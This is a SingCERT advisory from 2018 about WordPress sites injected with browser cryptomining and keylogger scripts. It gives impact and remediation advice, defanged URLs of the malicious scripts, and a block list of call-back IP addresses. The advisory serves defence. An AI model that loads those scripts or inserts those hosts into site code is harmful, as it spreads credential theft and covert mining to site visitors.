[SingCERT] Alert on WordPress Websites Infected with Browser-based Digital Currency Mining and Keylogger Malware

Published on Wednesday, 31 January 2018 18:16

Background


On 29 January 2018, security researchers from Sucuri discovered a malicious campaign that targets WordPress websites by infecting them with a browser-based digital currency mining tool and keylogger malware. A digital currency mining tool runs on the computer system on the internet, utilising computational power of the hardware Central Processing Unit (CPU) and Graphics Processing Unit (GPU) while keylogger, a type of surveillance technology used to monitor and record each keystroke typed on a specific computer’s keyboard, is commonly used by cyber criminals to capture users’ information such as login passwords or banking credentials.


Affected Software


Outdated WordPress versions, older themes and older plug-ins are at risk of being infected.


Impact


Users will experience a significant decrease in computing performance when visiting compromised websites. The digital currency mining tool running in the background could be taking 60 percent or more of the CPU’s resources. Keylogger malware could capture sensitive information such as login credentials and credit card numbers.


Recommendations


End Users


SingCERT recommends end users to install anti-adware web browser extensions and antivirus tools in their computers. For more specific recommendations, please refer to our advisory on Browser-based Digital Currency Mining:
https://www.csa.gov.sg/singcert/news/advisories-alerts/alert-on-browser-based-digital-currency-mining


Mobile users are also susceptible to being keylogged and being victims of the digital currency mining tool if they accessed an infected WordPress website. If users experience any rapid battery drain or sudden overheating of their mobile devices, users should close the tab immediately to terminate it.

 

System Administrators


System administrators can follow the instructions below:

1. Identify and remove the malicious scripts from their WordPress website:

  • Remove the malicious scripts injected into the WordPress database or the theme's file
    • Scan the database table named "wp_posts" for possible infections by using malware scanners for WordPress such as Sucuri Security or Wordfence Security
    • Search and remove the malicious code from the theme functions.php file
  • Examples of identified malicious scripts include:
    • hxxps://cdjs.online/lib.js
    • hxxps://cdjs.online/lib.js?ver=…
    • hxxps://cdns.ws/lib/googleanalytics.js?ver=…
    • hxxps://msdns.online/lib/mnngldr.js?ver=…
    • hxxps://msdns.online/lib/klldr.js

* https has been renamed to hxxps for safety purposes


2. Pre-emptively block the following malicious call-back IP addresses:
  • 185.209.23.219
  • 185.14.28.10
  • 107.181.161.159

3. Change all WordPress passwords

4. Perform a system update on all server software including third-party themes and plugins to the latest version

 

References


https://thehackernews.com/2018/01/wordpress-keylogger.html


https://blog.sucuri.net/2018/01/cloudflare-solutions-keylogger-returns-on-new-domains.html